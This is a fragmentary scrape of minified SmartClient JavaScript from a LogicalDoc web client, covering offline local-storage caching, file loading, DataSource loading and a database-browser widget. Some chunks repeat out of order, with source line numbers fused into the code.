else{var pq=[]}2467return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2468return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2469return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}2470this.$788(this.countKey,storedEntries);this.$788(this.keyKey,storedKeyBytes);this.$788(this.valueKey,storedValueBytes)},rebuildMetrics:function(){var pq=this.getPriorityQueue(),entries=0,keyBytes=0,valueBytes=0;for(var i=0;i<pq.length;i++){var value=this.get(pq[i]);entries++;keyBytes+=pq[i].length;valueBytes+=value.length}2471this.$788(this.countKey,entries);this.$788(this.keyKey,keyBytes);this.$788(this.valueKey,valueBytes)},getStorageMetrics:function(){var storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0,countLen=0,keyLen=0,valueLen=0;if(storedEntries)countLen=storedEntries.length;if(storedKeyBytes)keyLen=storedKeyBytes.length;if(storedValueBytes)valueLen=storedValueBytes.length;storedEntries=1*storedEntries;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;var pqText=this.get(this.priorityQueueKey);var overhead=this.countKey.length+this.keyKey.length+this.valueKey.length+countLen+keyLen+valueLen;var pqLength=pqText==null?0:pqText.length+(this.KEY_PREFIX+this.priorityQueueKey).length;return{storedEntries:storedEntries,storedKeyBytes:storedKeyBytes,storedValueBytes:storedValueBytes,metricsOverhead:overhead,priorityQueue:pqLength,total:storedKeyBytes+storedValueBytes+overhead+pqLength}},getTotalStorageUsed:function(){var metrics=this.getStorageMetrics();return metrics.storedKeyBytes+metrics.storedValueBytes+metrics.metricsOverhead+metrics.priorityQueue},storeResponse:function(dsRequest,dsResponse){var ts=new Date().getTime();dsResponse.offlineTimestamp=ts;var trimmedRequest=this.trimRequest(dsRequest),key=this.serialize(trimmedRequest),value=this.serialize(this.trimResponse(dsResponse));this.logDebug("storeResponse serializing: "+(new Date().getTime()-ts)+"ms");if(this.get(key)==null){if(this.getSCStoredValuesCount()>=this.maxResponsesToPersist){this.removeOldestEntry()}}


2491this.nextAttributeNumber[i]=counter}},sort:function(array){for(var i=0;i<array.length;i++){var swapped=false;for(var j=1;j<array.length-i;j++){if(array[j]<array[j-1]){var temp=array[j];array[j]=array[j-1];array[j-1]=temp;swapped=true}}2492if(!swapped)break}},getNextAttributeName:function(dataStore){if(this.unusedAttributeNumbers[dataStore]&&this.unusedAttributeNumbers[dataStore].length>0)2493{return"v"+this.unusedAttributeNumbers[dataStore].shift()}2494if(this.nextAttributeNumber[dataStore]==null){this.nextAttributeNumber[dataStore]=1}2495return"v"+this.nextAttributeNumber[dataStore]++},addToKeyIndex:function(userKey,dataStore,attr){var keyIndexValue=this.getKeyIndexValue(dataStore,attr);this.keyIndex[userKey]=keyIndexValue;this.reverseKeyIndex[keyIndexValue]=userKey;this.saveKeyIndex()},removeFromKeyIndex:function(userKey){var keyIndexValue=this.keyIndex[userKey];delete this.keyIndex[userKey];delete this.reverseKeyIndex[keyIndexValue];this.saveKeyIndex()},saveKeyIndex:function(){this.keyIndexStore.setAttribute(this.keyIndexKey,Offline.serialize(this.keyIndex));this.keyIndexStore.setAttribute(this.reverseKeyIndexKey,Offline.serialize(this.reverseKeyIndex));this.keyIndexStore.save("isc_userData_keyIndex")},buildReverseKeyIndex:function(){this.reverseKeyIndex={};for(var key in this.keyIndex){this.reverseKeyIndex[keyIndex[key]]=key}},getKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.keyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2496return ki},getReverseKeyIndexFromStore:function(){var kiText=this.keyIndexStore.getAttribute(this.reverseKeyIndexKey);if(kiText){eval("var ki = "+kiText)}else{var ki=null}2497return ki}};if(window.isc){isc.defineClass("Offline").addClassProperties(Offline);isc.defineClass("UserDataPersistence").addClassProperties(UserDataPersistence)}else{isc.addProperties=function(objOne,objTwo){for(var propName in objTwo)objOne[propName]=objTwo[propName]}2498isc.addProperties(isc.Offline,{serialize:function(object){return isc.OfflineJSONEncoder.encode(object)},logDebug:function(message){if(console)console.log(message)},logError:function(message){if(console){console.log(message)}else{alert(message)}},echoLeaf:function(obj){var output="",undef;if(obj===undef)return"undef";try{if(typeof obj=="Array"){output+="Array["+obj.length+"]"}else if(typeof obj=="Date"){output+="Date("+obj.toShortDate()+")"}else if(typeof obj=="Function"){output+=isc.Func.getName(obj,true)+"()"}


else{switch(typeof obj){case"string":if(obj.length<=40){output+='"'+obj+'"';break}2499output+='"'+obj.substring(0,40)+'..."['+obj.length+']';output=output.replaceAll("\n","\\n").replaceAll("\r","\\r");break;case"object":if(obj==null){output+="null";break}2500if(obj.tagName!=null){output+="["+obj.tagName+"Element]";break}2501var toString=""+obj;if(toString!=""&&toString!="[object Object]"&&toString!="[object]")


2456var end=new Date().getTime();var pqOK=false,metricsOK=false;while(!pqOK||!metricsOK){try{if(!pqOK)this.addToPriorityQueue(key);pqOK=true;if(!metricsOK)this.updateMetrics("put",key,value,oldValue);metricsOK=true}catch(e){if(this.isStorageException(e)){if(recycleEntries!==false){var entries=this.getStorageMetrics().storedEntries;if(entries>0){this.logDebug("Cache full when updating priority queue or metrics; removing oldest entry and trying again");this.removeOldestEntry();continue}}2457this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2458this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2459break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2460if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2461return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2462pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2463for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2464this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2465var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2466return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}



2457this.logDebug("Cache full when updating priority queue or metrics; rolling back the entire update");this.$786(key);if(pqOK)this.removeFromPriorityQueue(key);this.rebuildMetrics();throw e}else{throw e}}}2458this.logDebug("put() with key: "+key+"\nitem: "+this.echoLeaf(value)+": "+(end-ts)+"ms. Maintaining the priority queue and metrics took a further "+new Date().getTime()-end+"ms")},$788:function(key,value,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.setItem(key,value);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.putValue(key,value);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:this.logError("Persistence method '"+this.localStorageType()+"' not yet supported");break}},isStorageException:function(e){switch(this.localStorageType()){case this.LOCAL_STORAGE:if(isc.Browser.isIE){return(e.number==-2147024882)}else if(isc.Browser.isMoz){return(e.name=="NS_ERROR_DOM_QUOTA_REACHED")}else{return(e.name=="QUOTA_EXCEEDED_ERR")}2459break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2460if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2461return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2462pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2463for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2464this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2465var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2466return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2467return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}


316}317return _1}318,isc.A.load=function isc_c_DataSource_load(_1,_2,_3,_4){if(!isc.isAn.Array(_1))_1=[_1];if(_1.length<=0){this.logWarn("No DataSource IDs passed in.");return}319var _5=[];for(var i=0;i<_1.length;i++){if(!this.isLoaded(_1[i])||_3)_5.add(_1[i])}320var _7=_5.join(","),_8=isc.DataSource.loaderURL+(isc.DataSource.loaderURL.contains("?")?"&":"?")+(_4?"loadParents=true&":"")+"dataSource="+_7,_9=_1;;if(_5.length>0){isc.RPCManager.send(null,function(_10,_11,_12)


{if(_10.httpResponseCode==404){isc.warn("The DataSourceLoader servlet is not installed.");return null}321if(_4&&!_3)isc.DataSource.$92w=true;try{eval(_11)}catch(e){isc.logWarn("Encountered problems trying to load DataSources: "+isc.echoAll(e))}322delete isc.DataSource.$92w;if(_2)this.fireCallback(_2,["dsID"],[_9])},{actionURL:_8,httpMethod:"GET",willHandleError:true323}324)}else{this.logWarn("DataSource(s) already loaded: "+_1.join(",")+"\nUse forceReload to reload such DataSources");if(_2)this.fireCallback(_2,["dsID"],[_9])}325}326,isc.A.loadWithParents=function isc_c_DataSource_loadWithParents(_1,_2,_3){this.load(_1,_2,_3,true)}


2459break;case this.USERDATA_PERSISTENCE:return(e.number==-2147024857)}},get:function(key){var ts=new Date().getTime(),item;switch(this.localStorageType()){case this.LOCAL_STORAGE:item=localStorage.getItem(this.KEY_PREFIX+key);break;case this.USERDATA_PERSISTENCE:item=UserDataPersistence.getValue(this.KEY_PREFIX+key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}2460if(item)item=isc.clone(item);var end=new Date().getTime();this.logDebug("get() with key: "+key+"\nitem is: "+this.echoLeaf(item)+": "+(end-ts)+"ms");return item},remove:function(key,skipPriorityQueueUpdate){this.logDebug("Removing item for key: "+key);this.updateMetrics("remove",key);if(!skipPriorityQueueUpdate)this.removeFromPriorityQueue(key);this.$786(key)},$786:function(key,applyPrefix){key=(applyPrefix===false?"":this.KEY_PREFIX)+key;switch(this.localStorageType()){case this.LOCAL_STORAGE:localStorage.removeItem(key);break;case this.USERDATA_PERSISTENCE:UserDataPersistence.removeValue(key);break;case this.GLOBAL_STORAGE:case this.DATABASE_STORAGE:case this.GEARS_DATABASE_API:case this.GOOGLE_GEARS:break}},getUndecoratedKey:function(key){if(key&&key.startsWith(this.KEY_PREFIX)){key=key.substring(this.KEY_PREFIX.length)}2461return key},priorityQueueKey:"pq",addToPriorityQueue:function(userKey){this.removeFromPriorityQueue(userKey);var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2462pq.push(key);this.$788(this.priorityQueueKey,this.serialize(pq))},removeFromPriorityQueue:function(userKey){var key=this.toInternalKey(userKey);var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2463for(var i=0;i<pq.length;i++){if(pq[i]==key){var leading=pq.slice(0,i);var trailing=pq.slice(i+1);pq=leading.concat(trailing);break}}2464this.$788(this.priorityQueueKey,this.serialize(pq))},getAndRemoveOldestFromPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2465var oldest=pq.shift();this.$788(this.priorityQueueKey,this.serialize(pq));return this.toUserKey(oldest)},getPriorityQueueEntry:function(index){var key=this.getPriorityQueueKey(index);var value=this.get(key);var entry={};entry[key]=value;return entry},getPriorityQueueValue:function(index){var key=this.getPriorityQueueKey(index);return this.get(key)},getPriorityQueueKey:function(index){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2466return this.toUserKey(pq[index])},getPriorityQueue:function(){var pqText=this.get(this.priorityQueueKey);if(pqText){eval("var pq = "+pqText)}else{var pq=[]}2467return pq},toInternalKey:function(userKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return UserDataPersistence.getDataStoreKey(this.KEY_PREFIX+userKey)}2468return userKey},toUserKey:function(internalKey){if(this.localStorageType()==this.USERDATA_PERSISTENCE){return this.getUndecoratedKey(UserDataPersistence.getUserKey(internalKey))}2469return internalKey},countKey:"storedEntryCount__",keyKey:"storedKeyBytes__",valueKey:"storedValueBytes__",updateMetrics:function(mode,key,value,oldValue){var realKey=this.KEY_PREFIX+key,storedEntries=this.get(this.countKey)||0,storedKeyBytes=this.get(this.keyKey)||0,storedValueBytes=this.get(this.valueKey)||0;storedKeyBytes=1*storedKeyBytes;storedValueBytes=1*storedValueBytes;if(mode=="remove"){var item=this.get(key);if(item!=null){storedEntries--;storedKeyBytes-=realKey.length;storedValueBytes-=item.length}}else{if(oldValue==null){storedEntries++;storedKeyBytes+=realKey.length;storedValueBytes+=value.length}else{storedValueBytes+=value.length-oldValue.length}}


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_FileLoader.jsCode:

78return false}}79isc.Browser.$1560=("placeholder"in document.createElement("input")&&"placeholder"in document.createElement("textarea"));isc.Browser.$158n=isc.Browser.isMobileWebkit&&"webkitMaskBoxImage"in document.documentElement.style;isc.Browser.$162m=(window.screen!=null&&"orientation"in screen&&"type"in screen.orientation);isc.Browser.$165v=(!isc.Browser.isSafari&&!isc.Browser.isChrome&&!!document.createElementNS&&"getIntersectionList"in document.createElementNS("http://www.w3.org/2000/svg","svg")&&"createSVGRect"in document.createElementNS("http://www.w3.org/2000/svg","svg"));isc.Browser.$1691=(window.JSON!=null&&typeof window.JSON.parse==="function"&&typeof window.JSON.stringify==="function"&&window.JSON.stringify("\u0013")==="\"\\u0013\"");isc.Browser.canUseAggressiveGridTimings=!isc.Browser.isAndroid;isc.Browser.useHighPerformanceGridTimings=window.isc_useHighPerformanceGridTimings==null?isc.Browser.canUseAggressiveGridTimings:window.isc_useHighPerformanceGridTimings&&isc.Browser.canUseAggressiveGridTimings;isc.addGlobal("Params",function(_1){if(!_1)_1=window;var _2=typeof _1=="string"?_1:_1.location.href;var _3=_2.indexOf("?"),_4=_2.indexOf("#");if(_4<0||_4<_3)_4=_2.length;if(_3!=-1){var _5=_2.substring(_3+1,_4).split("&");for(var i=0,_7,_8;i<_5.length;i++){_7=_5[i];if(!_7)continue;_8=_7.indexOf("=");this[_7.substring(0,_8)]=unescape(_7.substring(_8+1))}}})80isc.params=new isc.Params();isc.getParams=function(_1){return new isc.Params(_1)}81if(isc.addProperties==null){isc.addGlobal("addProperties",function(_1,_2){for(var _3 in _2)82_1[_3]=_2[_3];return _1})}83isc.addGlobal("evalSA",function(_1){if(isc.eval)isc.eval(_1);else eval(_1)});isc.addGlobal("defineStandaloneClass",function(_1,_2){if(isc[_1]){if(_1=="FileLoader"&&isc.FileLoader.$139n){isc[_1]=null}else{return}}84isc.addGlobal(_1,_2);isc.addProperties(_2,{$i:_1,fireSimpleCallback:function(_6){_6.method.apply(_6.target?_6.target:window,_6.args?_6.args:[])},logMessage:function(_6,_7,_8){if(isc.Log){isc.Log.logMessage(_6,_7,_8);return}85if(!isc.$j)isc.$j=[];isc.$j[isc.$j.length]={priority:_6,message:_7,category:_8,timestamp:new Date()}},logError:function(_6){this.logMessage(2,_6,this.$i)},logWarn:function(_6){this.logMessage(3,_6,this.$i)},logInfo:function(_6){this.logMessage(4,_6,this.$i)},logDebug:function(_6){this.logMessage(5,_6,this.$i)},$102q:function(_6,_7){if(!_6){throw(_7||"assertion failed")}},isAString:function(_6){if(isc.isA)return isc.isA.String(_6);return typeof _6=="string"},isAnArray:function(_6){if(isc.isA)return isc.isAn.Array(_6);return typeof _6=="array"},$ez:new RegExp("'","g"),$e0:new RegExp("\"","g"),$138c:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var _3=_7?this.$ez:this.$e0,_4=_7?"'":'"';return _4+_6.replace(/\\/g,"\\\\").replace(_3,'\\'+_4).replace(/\t/g,"\\t").replace(/\r/g,"\\r").replace(/\n/g,"\\n").replace(/\u2028/g,"\\u2028").replace(/\u2029/g,"\\u2029")+_4},$138j:function(_6,_7){if(!this.isAString(_6))_6=String(_6);var s=_6.replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">").replace(/(\r\n|\r|\n) /g,"<BR> ").replace(/(\r\n|\r|\n)/g,"<BR>").replace(/\t/g," ");return(_7?s.replace(/ /g," "):s.replace(/ /g," "))}});_2.isAn=_2.isA;return _2});isc.defineStandaloneClass("SA_Page",{$l:(isc.Page&&isc.Page.isLoaded())||false,$m:[],isLoaded:function(){return this.$l},onLoad:function(_1,_2,_3){this.$m.push({method:_1,target:_2,args:_3});if(!this.$n){this.$n=true;if((isc.Browser.isIE&&isc.Browser.version<11)||isc.Browser.isOpera){window.attachEvent("onload",function(){isc.SA_Page.$o()})}else{window.addEventListener("load",function(){isc.SA_Page.$o()},true)}}},$o:function(){if(!window.isc||this.$l)return;this.$l=true;for(var i=0;i<this.$m.length;i++){var _2=this.$m[i];this.fireSimpleCallback(_2)}86delete this.$m}});if(!isc.SA_Page.isLoaded()){isc.SA_Page.onLoad(function(){this.$l=true},isc.SA_Page)}87isc.defineStandaloneClass("SA_XMLHttp",{$401:function(){var _1=arguments.callee.xmlHttpRequest;if(!_1)return;if(_1.readyState!=4)return;arguments.callee.xmlHttpRequest=null;var _2=arguments.callee.callback;if(_2)isc.SA_XMLHttp.$402(_2,_1)},$402:function(_1,_2){var _3=[_2];if(_1.args)_1.args=_1.args.concat(_3);else _1.args=_3;this.fireSimpleCallback(_1)},get:function(_1,_2){var _3=this.createXMLHttpRequest();if(!_3){this.logWarn("XMLHttpRequest not available - can't fetch url: "+_1);return}88_3.open("GET",_1,true);if(isc.Browser.isIE){var _4=this.$401;_4.callback=_2;_4.xmlHttpRequest=_3;_3.onreadystatechange=_4}else{_3.onreadystatechange=function(){if(_3.readyState!=4)return;isc.SA_XMLHttp.$402(_2,_3)}}


File name: logicaldoc/logicaldoc-gui/war/login/sc/system/development/ISC_Tools.jsCode:

140delete this.showingResponseTree},isc.A.showSampleRequest=function isc_SchemaViewer_showSampleRequest(_1){this.logInfo("showing a sample request");if(this.logIsDebugEnabled())this.logDebug("sample request data:"+this.echoAll(_1));var _2=isc.DOMTree.create({rootElement:_1.documentElement});if(!this.showingSampleRequest){this.responseStack.addSection({isSampleRequest:true,expanded:true,resizable:true,title:"Generated Sample Service Request",items:[this.addAutoChild("requestTree",{data:_2},isc.DOMGrid)]})}else{this.requestTree.setData(_2)}141this.showingSampleRequest=true},isc.A.clearSampleRequest=function isc_SchemaViewer_clearSampleRequest(){if(this.showingSampleRequest){for(var i=0;i<this.responseStack.sections.length;i++){if(this.responseStack.sections[i].isSampleRequest){this.responseStack.removeSection(i);break}}}delete this.showingSampleRequest});isc.B._maxIndex=isc.C+15;isc.ClassFactory.defineClass("DatabaseBrowser","Window");isc.A=isc.DatabaseBrowser.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.A.orientation="vertical";isc.A.title="Database Browser";isc.A.width="90%";isc.A.height="90%";isc.A.isModal=true;isc.A.showModalMask=true;isc.A.canDragResize=true;isc.A.autoFetchData=true;isc.A.serverType="sql";isc.A.schemaTreeConstructor="ListGrid";isc.A.schemaTreeDefaults={autoParent:"schemaView",dbBrowser:this.creator,dataSource:isc.DataSource.create({ID:"$84u",clientOnly:true,fields:[{name:"name",title:"Name"},{name:"type",title:"Type",width:60,valueMap:["table","view"]}]}),showFilterEditor:true,filterOnKeypress:true,canExpandRecords:true,detailDefaults:{_constructor:"ListGrid",autoFitData:"vertical",autoFitMaxRecords:8,showResizeBar:true},getExpansionComponent:function(_1){var _2=this.createAutoChild("detail",{sortField:"primaryKey",sortDirection:"descending",defaultFields:[{name:"name",title:"Column",formatCellValue:function(_3,_1){if(_1.primaryKey)return"<b>"+_3+"</b>";return _3}},{name:"type",title:"Type",width:50},{name:"length",title:"Length",width:45},{name:"primaryKey",title:"PK",type:"boolean",showIf:"false",width:22}]});isc.DMI.call("isc_builtin","com.isomorphic.tools.BuiltinRPC","getFieldsFromTable",_1.name,this.schema,this.serverType,this.creator.dbName,function(_3,_4){_2.setData(_4)});return _2},selectionChanged:function(_1,_2){if(_2){var _3=_1.name;if(_3&&_3!=this.creator.$64p){this.creator.getDataSourceFromTable(_3);this.creator.populateDataViewHeader()}}}};isc.A.schemaRefreshButtonDefaults={_constructor:"Img",size:16,src:"[SKIN]/actions/refresh.png",click:"this.creator.getDatabaseTables()"};isc.A.databaseListConstructor="ListGrid";isc.A.databaseListDefaults={height:150,autoParent:"schemaView",dataSource:isc.DataSource.create({ID:"$84v",clientOnly:true,fields:[{name:"dbName",title:"Name"},{name:"dbStatus",title:"Status"},{name:"dbProductName",title:"Product Name"},{name:"dbProductVersion",title:"Product Version"}]}),defaultFields:[{name:"dbName"},{name:"dbStatus"}],sortField:"dbName",showFilterEditor:true,filterOnKeypress:true,canDragSelectText:true,selectionChanged:function(_1,_2){if(_2){this.creator.clearSchemaTree();this.creator.dbName=_1.dbName;this.creator.getDatabaseTables()}},canHover:true,cellHoverHTML:function(_1){if(!this.hoverDV)this.hoverDV=isc.DetailViewer.create({dataSource:this.dataSource,width:200,autoDraw:false});this.hoverDV.setData(_1);return this.hoverDV.getInnerHTML()}};isc.A.dbListConfigButtonDefaults={_constructor:"Img",size:16,src:"database_gear.png",click:"this.creator.configureDatabases()"};isc.A.dbListRefreshButtonDefaults={_constructor:"Img",size:16,src:"[SKIN]/actions/refresh.png",click:"this.creator.getDefinedDatabases()"};isc.A.dataGridConstructor="ListGrid";isc.A.dataGridDefaults={canDragSelectText:true,showFilterEditor:true,autoFitFieldWidths:true,autoFitWidthApproach:"title",autoParent:"dataView"};isc.A.showSelectButton=true;isc.A.selectButtonConstructor="Button";isc.A.selectButtonDefaults={title:"Next >",enabled:false,autoParent:"outerLayout"};isc.A.outerLayoutDefaults={_constructor:isc.VLayout,width:"100%",height:"100%",autoSize:true,autoDraw:true,autoParent:"body"};isc.A.innerLayoutDefaults={_constructor:isc.HLayout,width:"100%",height:"100%",autoDraw:true,autoParent:"outerLayout"};isc.A.showSchemaView=true;isc.A.schemaViewDefaults={_constructor:isc.SectionStack,visibilityMode:"multiple",autoParent:"innerLayout"};isc.A.showDataView=true;isc.A.dataViewDefaults={_constructor:isc.SectionStack,width:"65%",height:"100%",autoParent:"innerLayout"};isc.B.push(isc.A.configureDatabases=function isc_DatabaseBrowser_configureDatabases(){var _1=this;var _2=isc.DBConfigurator.showWindow({width:this.getVisibleWidth()-50,height:this.getVisibleHeight()-50,autoCenter:true,isModal:true,closeClick:function(){this.destroy();_1.getDefinedDatabases()}})});isc.B._maxIndex=isc.C+1;isc.A=isc.DatabaseBrowser.getPrototype();isc.B=isc._allFuncs;isc.C=isc.B._maxIndex;isc.D=isc._funcClasses;isc.D[isc.C]=isc.A.Class;isc.B.push(isc.A.initWidget=function isc_DatabaseBrowser_initWidget(){this.Super("initWidget",arguments);this.title="Database Browser - "+this.serverType.toUpperCase();this.createChildren()},isc.A.createChildren=function isc_DatabaseBrowser_createChildren(){this.Super("createChildren");this.body.hPolicy="fill";this.body.vPolicy="fill";this.addAutoChild("outerLayout");this.addAutoChild("innerLayout",null,null,this.outerLayout);this.addAutoChild("schemaView",{showResizeBar:this.showDataView},null,this.innerLayout);this.databaseList=this.createAutoChild("databaseList");this.dbListConfigButton=this.createAutoChild("dbListConfigButton");this.dbListRefreshButton=this.createAutoChild("dbListRefreshButton");if(this.serverType=="sql"){this.schemaView.addSection({title:"Databases",showHeader:true,expanded:true,hidden:false,items:[this.databaseList],controls:[this.dbListConfigButton,this.dbListRefreshButton]})}142this.addAutoChild("dataView",null,null,this.innerLayout);this.dataView.addSection({autoDraw:true,showHeader:true,expanded:true,hidden:false});this.dataStack=this.dataView.sections[0];this.schemaTree=this.createAutoChild("schemaTree");this.schemaRefreshButton=this.createAutoChild("schemaRefreshButton");this.schemaView.addSection({title:"Tables & 